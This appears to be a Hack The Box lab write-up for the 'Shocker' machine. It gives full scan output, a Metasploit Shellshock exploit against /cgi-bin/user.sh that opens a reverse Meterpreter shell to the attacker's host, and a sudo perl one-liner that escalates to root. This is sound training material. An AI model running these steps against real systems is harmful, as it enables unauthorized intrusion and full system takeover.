Summary
A straightforward box showcasing the shellshock vulnerability with a simple root step. Enjoy!
Foothold
We start out by doing an nmap port scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(bitis㉿workstation)-[~/htb/Machines/Shocker]
└─$ nmap -sC -sV 10.129.1.175
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-02 18:11 CEST
Nmap scan report for 10.129.1.175
Host is up (0.023s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds
Visiting the web application hosted via port 80 we are greeted with the following doodle of a bug:
The site is otherwise very bare. Doing a scan with feroxbuster we find the cgi-bin directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(bitis㉿workstation)-[~/htb/Machines/Shocker]
└─$ feroxbuster -u http://10.129.1.175/ -r -x php js html pdf -B -w /usr/share/wordlists/dirb/common.txt 1 ⨯
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.7.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.1.175/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirb/common.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.7.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [php, js, html, pdf]
🏦 Collect Backups │ true
🏁 HTTP methods │ [GET]
📍 Follow Redirects │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 9l 13w 137c http://10.129.1.175/
403 GET 11l 32w 296c http://10.129.1.175/.htpasswd
403 GET 11l 32w 297c http://10.129.1.175/.htpasswd~
403 GET 11l 32w 300c http://10.129.1.175/.htpasswd.bak
403 GET 11l 32w 301c http://10.129.1.175/.htpasswd.bak2
403 GET 11l 32w 300c http://10.129.1.175/.htpasswd.old
403 GET 11l 32w 298c http://10.129.1.175/.htpasswd.1
403 GET 11l 32w 296c http://10.129.1.175/.htaccess
---SNIP---
403 GET 11l 32w 312c http://10.129.1.175/cgi-bin/.htpasswd.pdf.bak
403 GET 11l 32w 313c http://10.129.1.175/cgi-bin/.htpasswd.pdf.bak2
403 GET 11l 32w 312c http://10.129.1.175/cgi-bin/.htpasswd.pdf.old
403 GET 11l 32w 310c http://10.129.1.175/cgi-bin/.htpasswd.pdf.1
200 GET 9l 13w 137c http://10.129.1.175/index.html
403 GET 11l 32w 300c http://10.129.1.175/server-status
[####################] - 15s 46369/46369 0s found:196 errors:0
[####################] - 13s 23070/23070 1754/s http://10.129.1.175/
[####################] - 13s 23070/23070 1774/s http://10.129.1.175/cgi-bin/
Searching for an exploit related to this directory, we quickly find about about shellshock, a vulnerability which can be used to gain code execution on the target system. More info can be found here. The exploit can be used to gain a foothold on the system.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/user.sh
TARGETURI => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 10.10.14.31:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (989032 bytes) to 10.129.1.175
[*] Meterpreter session 1 opened (10.10.14.31:4444 -> 10.129.1.175:41436) at 2022-07-02 18:29:44 +0200
meterpreter > getuid
Server username: shelly
meterpreter > shell
Process 1737 created.
Channel 1 created.
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
Privilege escalation
To gain root on the system we need to exploit that we can run perl as root. See here for more information.
1
2
3
sudo /usr/bin/perl -e 'exec "/bin/sh";'
id
uid=0(root) gid=0(root) groups=0(root)
Rooted!